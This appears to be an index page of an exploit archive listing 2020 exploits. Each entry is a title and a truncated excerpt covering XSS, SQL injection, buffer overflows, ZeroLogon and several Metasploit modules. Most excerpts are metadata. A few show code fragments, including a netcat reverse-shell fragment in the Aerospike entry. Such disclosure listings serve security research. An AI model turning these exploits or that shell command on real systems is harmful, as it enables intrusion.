Free MP3 CD Ripper 2.8 - Multiple File Buffer Overflow (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "Free MP3 CD Ripper 2.6 %q This module exploits a buffer overflow in Free MP3 CD Ripper versions 2.6 and 2.8. By constructing a specially crafted...
WonderCMS 3.1.3 - 'content' Persistent Cross-Site Scripting
Exploit Title: WonderCMS 3.1.3 - 'content' Persistent Cross-Site Scripting Date: 20-11-2020 Exploit Author: Hemant Patidar HemantSolo Vendor Homepage: https://www.wondercms.com/ Version: 3.1.3 Tested on: Windows 10/Kali Linux CVE: CVE-2020-29233 Stored Cross-site scripting (XSS): Stored XSS, also...
Nagios Log Server 2.1.7 - Persistent Cross-Site Scripting
Exploit Title: Nagios Log Server 2.1.7 - 'snapshotname' Persistent Cross-Site Scripting Date: 31.08.2020 Exploit Author: Emre ÖVÜNÇ Vendor Homepage: https://www.nagios.com/ Software Link: https://www.nagios.com/products/nagios-log-server/ Version: 2.1.7 Tested on: Linux/ISO Link:...
Gemtek WVRTM-127ACN 01.01.02.141 - Authenticated Arbitrary Command Injection
Exploit Title: Gemtek WVRTM-127ACN 01.01.02.141 - Authenticated Arbitrary Command Injection Date: 13/09/2020 Exploit Author: Gabriele Zuddas Version: 01.01.02.127, 01.01.02.141 CVE : CVE-2020-24365 Service Provider : Linkem Product Name : LTE CPE Model ID : WVRTM-127ACN Serial ID : GMK17041801108...
Gitlab 12.9.0 - Arbitrary File Read (Authenticated)
Exploit Title: Gitlab 12.9.0 - Arbitrary File Read Authenticated Google Dork: - Date: 11/15/2020 Exploit Author: Jasper Rasenberg Vendor Homepage: https://about.gitlab.com Software Link: https://about.gitlab.com/install Version: tested on gitlab version 12.9.0 Tested on: Kali Linux 2020.3 You can...
TestBox CFML Test Framework 4.1.0 - Directory Traversal
Title: TestBox CFML Test Framework 4.1.0 - Directory Traversal Author: Darren King Date: 2020-07-23 Vendor Homepage: https://www.ortussolutions.com/products/testbox Software Link: https://www.ortussolutions.com/parent/download/testbox?version=3.1.0 Version : 2.3.0 through to 4.1.0 Tested on: Adob...
Fortinet FortiOS 6.0.4 - Unauthenticated SSL VPN User Password Modification
Exploit Title: Fortinet FortiOS 6.0.4 - Unauthenticated SSL VPN User Password Modification Google Dork: intitle:"Please Login" "Use FTM Push" Date: 15/11/2020 Exploit Author: Ricardo Longatto Details: This exploit allow change users password from SSLVPN web portal Vendor Homepage:...
M/Monit 3.7.4 - Privilege Escalation
Title: M/Monit 3.7.4 - Privilege Escalation Author: Dolev Farhi Date: 2020-07-09 Vendor Homepage: https://mmonit.com/ Version : 3.7.4 import sys import requests url = 'http://youriphere:8080' username = 'test' password = 'test123' sess = requests.Session sess.gethost def login: print'Attempting t...
TestBox CFML Test Framework 4.1.0 - Arbitrary File Write and Remote Code Execution
Title: TestBox CFML Test Framework 4.1.0 - Arbitrary File Write and Remote Code Execution Author: Darren King Date: 2020-07-23 Vendor Homepage: https://www.ortussolutions.com/products/testbox Software Link: https://www.ortussolutions.com/parent/download/testbox?version=3.1.0 Version : 2.4.0 throu...
PESCMS TEAM 2.3.2 - Multiple Reflected XSS
Exploit Title: PESCMS TEAM 2.3.2 - Multiple Reflected XSS Date: 2020-11-18 Exploit Author: icekam Vendor Homepage: https://www.pescms.com/ Software Link: https://github.com/lazyphp/PESCMS-TEAM Version: PESCMS Team 2.3.2 CVE: CVE-2020-28092 PESCMS Team 2.3.2 has multiple reflected XSS via the id...
Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure
Exploit Title: Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure Date: 17th November 2020 Exploit Author: Nitesh Surana Vendor Homepage: https://www.gxgroup.eu/ont-products/ Version: P4410-V2-1.34H Tested on: Windows/Kali CVE : CVE-2020-25988 import upnpy upnp = upnpy.UPnP Discover UPnP...
Internet Download Manager 6.38.12 - Scheduler Downloads Scheduler Buffer Overflow (PoC)
Exploit Title: Internet Download Manager 6.38.12 - Scheduler Downloads Scheduler Buffer Overflow PoC Date: November 18, 2020 Exploit Author: Vincent Wolterman Vendor Homepage: http://www.internetdownloadmanager.com/ Software Link: http://www.internetdownloadmanager.com/download.html Version:...
M/Monit 3.7.4 - Password Disclosure
Title: M/Monit 3.7.4 - Password Disclosure Author: Dolev Farhi Date: 2020-07-09 Vendor Homepage: https://mmonit.com/ Version : 3.7.4 import sys import requests url = 'http://youriphere:8080' username = 'test' password = 'test123' sess = requests.Session sess.gethost def login: print'Attempting to...
xuucms 3 - 'keywords' SQL Injection
Exploit Title: xuucms 3 - 'keywords' SQL Injection Date: 2020-11-18 Exploit Author: icekam Vendor Homepage: https://www.cxuu.top/ Software Link: https://github.com/cbkhwx/cxuucmsv3 Version: cxuucms - v3 CVE : CVE-2020-28091 SQL injection exists in search.php. For details, please refer to:...
ZeroLogon - Netlogon Elevation of Privilege
Exploit Title: ZeroLogon - Netlogon Elevation of Privilege Date: 2020-10-04 Exploit Author: West Shepherd Vendor Homepage: https://www.microsoft.com Version: Microsoft Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows Server 2012, Windows Server 2008 R2 Tested on: Microsof...
Wordpress Plugin WPForms 1.6.3.1 - Persistent Cross Site Scripting (Authenticated)
Exploit Title : Wordpress Plugin WPForms 1.6.3.1 - Persistent Cross Site Scripting Authenticated Exploit Author : ZwX Exploit Date : 2020-10-23 Vendor Homepage : https://wpforms.com/ Download Plugin : https://downloads.wordpress.org/plugin/wpforms-lite.1.6.3.1.zip + Description Vulnerability:...
BigBlueButton 2.2.25 - Arbitrary File Disclosure and Server-Side Request Forgery
Exploit Title: BigBlueButton 2.2.25 - Arbitrary File Disclosure and Server-Side Request Forgery Date: 2020-09-11 Exploit Author: RedTeam Pentesting GmbH Vendor Homepage: https://bigbluebutton.org/ Version: BigBlueButton 2.2.25 RedTeam Pentesting discovered a vulnerability in the BigBlueButton web...
Microsoft Internet Explorer 11 - Use-After-Free
Exploit Title: Microsoft Internet Explorer 11 - Use-After-Free Date: 2020-05-07 Exploit Author: maxpl0it Vendor Homepage: https://www.microsoft.com/ Software Link: https://www.microsoft.com/en-gb/download/internet-explorer.aspx Version: IE 8, 9, 10, and 11 Tested on: Windows 7 x64 CVE :...
Froxlor Froxlor Server Management Panel 0.10.16 - Persistent Cross-Site Scripting
Exploit Title: Froxlor Froxlor Server Management Panel 0.10.16 - Persistent Cross-Site Scripting Exploit Author: Vulnerability-Lab Date: 2020-11-12 Vendor Homepage: https://froxlor.org/ Software Link: https://froxlor.org/download/ Version: 0.10.16 Document Title: =============== Froxlor v0.10.16 ...
Online Doctor Appointment Booking System PHP and Mysql 1.0 - 'q' SQL Injection
Exploit Title: Online Doctor Appointment Booking System PHP and Mysql 1.0 - 'q' SQL Injection Google Dork: N/A Date: 11/16/2020 Exploit Author: Ramil Mustafayev Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-doctor-appointment-booking-system-php-and-mysql/ Software...
LCD_Service 1.0.1.0 - 'LCD_Service' Unquote Service Path
Exploit Title: Huawei LCDService 1.0.1.0 - 'LCDService' Unquote Service Path Date: 2020-11-07 Exploit Author: Gerardo González Vendor Homepage: https://consumer.huawei.com/mx Software Link: https://consumer.huawei.com/mx Version: 1.0.1.0 Tested on: Windows 10 Home Single Language x64 Esp Step to...
Aerospike Database 5.1.0.3 - OS Command Execution
Exploit Title: Aerospike Database 5.1.0.3 - OS Command Execution Date: 2020-08-01 Exploit Author: Matt S Vendor Homepage: https://www.aerospike.com/ Version: &1|nc ip port /tmp/ft&' def getclientcfg: try: return aerospike.client 'hosts': cfg.ahost, cfg.aport, 'policies': 'timeout': 8000.connect...
Apache Struts 2.5.20 - Double OGNL evaluation
Exploit Title: Apache Struts 2.5.20 - Double OGNL evaluation Date: 08/18/2020 Exploit Author: West Shepherd Vendor Homepage: https://struts.apache.org/download.cgi Version: Struts 2.0.0 - Struts 2.5.20 S2-059 CVE : CVE-2019-0230 Credit goes to reporters Matthias Kaiser, Apple InformationSecurity,...
Joomla Plugin Simple Image Gallery Extended (SIGE) 3.5.3 - Multiple Vulnerabilities
Exploit Title: Joomla Plugin Simple Image Gallery Extended SIGE 3.5.3 - Multiple Vulnerabilities Exploit Author: Vulnerability-Lab Date: 2020-11-11 Vendor Homepage: https://kubik-rubik.de/sige-simple-image-gallery-extended Software Link: https://kubik-rubik.de/sige-simple-image-gallery-extended...
SugarCRM 6.5.18 - Persistent Cross-Site Scripting
Exploit Title: SugarCRM 6.5.18 - Persistent Cross-Site Scripting Exploit Author: Vulnerability-Lab Date: 2020-11-16 Vendor Homepage: https://www.sugarcrm.com Version: 6.5.18 Document Title: =============== SugarCRM v6.5.18 - Contacts Persistent Cross Site Web Vulnerability References Source:...
WordPress Plugin Buddypress 6.2.0 - Persistent Cross-Site Scripting
Exploit Title: WordPress Plugin Buddypress 6.2.0 - Persistent Cross-Site Scripting Exploit Author: Vulnerability-Lab Date: 2020-11-13 Vendor Homepage: https://wordpress.org/plugins/buddypress/ Version: 6.2.0 Document Title: =============== Buddypress v6.2.0 WP Plugin - Persistent Web Vulnerabilit...
EgavilanMedia User Registration & Login System with Admin Panel Exploit - SQLi Auth Bypass
Exploit Title: EgavilanMedia User Registration & Login System with Admin Panel Exploit - SQLi Auth Bypass Date: 17-11-2020 Exploit Author: Kislay Kumar Vendor Homepage: http://egavilanmedia.com Software Link : http://egavilanmedia.com/user-registration-and-login-system-with-admin-panel/ Version:...
Car Rental Management System 1.0 - 'car_id' Sql Injection
Exploit Title: Car Rental Management System 1.0 - 'carid' Sql Injection Date: 2020-11.13 Exploit Author: Mehmet Kelepçe / Gais Cyber Security Author ID: 8763 Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html Software Link:...
PMB 5.6 - 'chemin' Local File Disclosure
Exploit Title: PMB 5.6 - 'chemin' Local File Disclosure Date: 2020-10-13 Google Dork: inurl:opaccss Exploit Author: 41-trk Tarik Bakir Vendor Homepage: http://www.sigb.net Software Link: http://forge.sigb.net/redmine/projects/pmb/files Affected versions : = 5.6 Tested on: Ubuntu 18.04.1 The PMB G...
Advanced System Care Service 13 - 'AdvancedSystemCareService13' Unquoted Service Path
Title: Advanced System Care Service 13 - 'AdvancedSystemCareService13' Unquoted Service Path Author: Jair Amezcua Date: 2020-11-10 Vendor Homepage: https://www.iobit.com Software Link: https://www.iobit.com/es/advancedsystemcarepro.php Version : 13.0.0.157 Tested on: Windows 10 64bitEN CVE : N/A ...
User Registration & Login and User Management System 2.1 - Login Bypass SQL Injection
Exploit Title: User Registration & Login and User Management System 2.1 - Login Bypass SQL Injection Date: 2020–11–14 Exploit Author: Mayur Parmar (th3cyb3rc0p) Vendor Homepage: https://phpgurukul.com Software Link:...
Water Billing System 1.0 - 'id' SQL Injection (Authenticated)
Exploit Title: Water Billing System 1.0 - 'id' SQL Injection Authenticated Date: 2020-11-14 Exploit Author: Mehmet Kelepçe / Gais Cyber Security Author ID: 8763 Vendor: https://www.sourcecodester.com/php/14560/water-billing-system-phpmysqli-full-source-code.html Version: 1.0 Tested on: Apache2 an...
Logitech Solar Keyboard Service - 'L4301_Solar' Unquoted Service Path
Title: Logitech Solar Keyboard Service - 'L4301Solar' Unquoted Service Path Author: Jair Amezcua Date: 2020-11-10 Vendor Homepage: https://www.logitech.com/es-mx Software Link: https://support.logi.com/hc/en-us/articles/360024692874--Downloads-Wireless-Solar-Keyboard-K750 Version : 1.10.3.0 Teste...
Pandora FMS 7.0 NG 749 - 'CG Items' SQL Injection (Authenticated)
Exploit Title: Pandora FMS 7.0 NG 749 - 'CG Items' SQL Injection Authenticated Date: 11-14-2020 Exploit Author: Matthew Aberegg, Alex Prieto Vendor Homepage: https://pandorafms.com/ Patch Link: https://github.com/pandorafms/pandorafms/commit/1258a1a63535f60924fb69b1f7812c678570cc8e Software Link:...
Car Rental Management System 1.0 - 'id' SQL Injection (Authenticated)
Exploit Title: Car Rental Management System 1.0 - 'id' SQL Injection Authenticated Date: 2020-11-14 Exploit Author: Mehmet Kelepçe / Gais Cyber Security Author ID: 8763 Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html Software...
Cisco 7937G - DoS/Privilege Escalation
Exploit Title: Cisco 7937G 1-4-5-7 - DoS/Privilege Escalation Date: 2020-08-10 Exploit Author: Cody Martin Vendor Homepage: https://cisco.com Version: =SIP-1-4-5-7 Tested On: SIP-1-4-5-5, SIP-1-4-5-7 !/usr/bin/python import sys import getopt import requests import paramiko import socket import os...
Car Rental Management System 1.0 - Remote Code Execution (Authenticated)
Exploit Title: Car Rental Management System 1.0 - Remote Code Execution Authenticated Date: 2020-11.13 Exploit Author: Mehmet Kelepçe / Gais Cyber Security Author ID: 8763 Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html...
Atheros Coex Service Application 8.0.0.255 - 'ZAtheros Bt&Wlan Coex Agent' Unquoted Service Path
Exploit Title: Atheros Coex Service Application 8.0.0.255 -'ZAtheros Bt&Wlan Coex Agent' Unquoted Service Path Exploit Author : Isabel Lopez Exploit Date: 2020-11-13 Vendor Homepage : https://www.file.net/process/athcoexagent.exe.html Link Software :...
KiteService 1.2020.1113.1 - 'KiteService.exe' Unquoted Service Path
Exploit Title: KiteService 1.2020.1113.1 - 'KiteService.exe' Unquoted Service Path Discovery by: IRVIN GIL Discovery Date: 2020-11-14 Vendor Homepage: https://www.kite.com/ Tested Version: 1.2020.1113.1 Vulnerability Type: Unquoted Service Path Tested on OS: Windows 10 x64 es Step to discover...
SAntivirus IC 10.0.21.61 - 'SAntivirusIC' Unquoted Service Path
Exploit Title: SAntivirus IC 10.0.21.61 - 'SAntivirusIC' Unquoted Service Path Discovery by: Mara Ramirez Discovery Date: 10-11-2020 Vendor Homepage: https://www.segurazo.com/download.html Software Links : https://www.segurazo.com/download.html Tested Version: 10.0.21.61 Vulnerability Type:...
OpenCart Theme Journal 3.1.0 - Sensitive Data Exposure
Exploit Title: OpenCart Theme Journal 3.1.0 - Sensitive Data Exposure Date: 11-06-2020 Vendor Homepage: https://www.journal-theme.com/ Vendor Changelog: https://docs.journal-theme.com/changelog Exploit Author: Jinson Varghese Behanan @JinsonCyberSec Author Advisory:...
October CMS Build 465 - Arbitrary File Read Exploit (Authenticated)
Exploit Title: October CMS Build 465 - Arbitrary File Read Exploit Authenticated Date: 2020-03-31 Exploit Author: Sivanesh Ashok Vendor Homepage: https://octobercms.com/ Version: Build 465 and below Tested on: Windows 10 / XAMPP / October CMS Build 465 CVE: CVE-2020-5295 echo ''' Authenticated...
IDT PC Audio 1.0.6425.0 - 'STacSV' Unquoted Service Path
Exploit Title: IDT PC Audio 1.0.6425.0 - 'STacSV' Unquoted Service Path Discovery by: Isabel Lopez Software link: https://www.pconlife.com/download/otherfile/20566/098185e9b7c417cf7480bb9f839db652/ Discovery Date: 2020-11-07 Tested Version: 1.0.6425.0 Vulnerability Type: Unquoted Service Path...
Apache Tomcat - AJP 'Ghostcat' File Read/Inclusion (Metasploit)
require "msf/core" class MetasploitModule "Ghostcat", "Description" = %q When using the Apache JServ Protocol AJP, care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such...
ASUS TM-AC1900 - Arbitrary Command Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'ASUS TM-AC1900 - Arbitrary Command Execution', 'Description' = %q This module exploits a code execution vulnerability within the ASUS TM-AC1900...
Touchbase.io 1.10 - Stored Cross Site Scripting
Exploit Title: Touchbase.io 1.10 - Stored Cross Site Scripting Date: 2020-11-11 Exploit Author: Simran Sankhala Vendor Homepage: https://touchbase.ai/ Software Link: https://touchbase.ai/ Version: 1.1.0 Tested on: Windows 10 Proof Of Concept: touchbase.ai application allows stored XSS, via the 'A...
Citrix ADC NetScaler - Local File Inclusion (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Citrix ADC NetScaler - Local File Inclusion Metasploit', 'Description' = % The remote device is affected by multiple vulnerabilities. An...
DigitalPersona 5.1.0.656 'DpHostW' - Unquoted Service Path
Exploit Title: DigitalPersona 5.1.0.656 'DpHostW' - Unquoted Service Path Discovery by: Teresa Q Discovery Date: 2020-11-11 Vendor:DigitalPersona U. are U. One Touch Version: 5.1.0.656 Vulnerability Type: Unquoted Service Path Vendor Homepage : https://www.hidglobal.com/crossmatch Tested on OS:...
Bludit 3.9.2 - Authentication Bruteforce Bypass (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Bludit Panel Brute force', 'Description' = %q This Module performs brute force attack on Bludit Panel. , 'Author' = 'Eren Simsek ', 'License' =...
Nidesoft 3GP Video Converter 2.6.18 - Local Stack Buffer Overflow
Exploit Title: Nidesoft 3GP Video Converter 2.6.18 - Local Stack Buffer Overflow Date: 2020-07-30 Author: Felipe Winsnes Software Link: http://www.nidesoft.com/downloads/3gp-video-converter.exe Version: 2.6.18 Tested on: Windows 7 x86 Blog: https://whitecr0wz.github.io/ Proof of Concept: 1.- Run...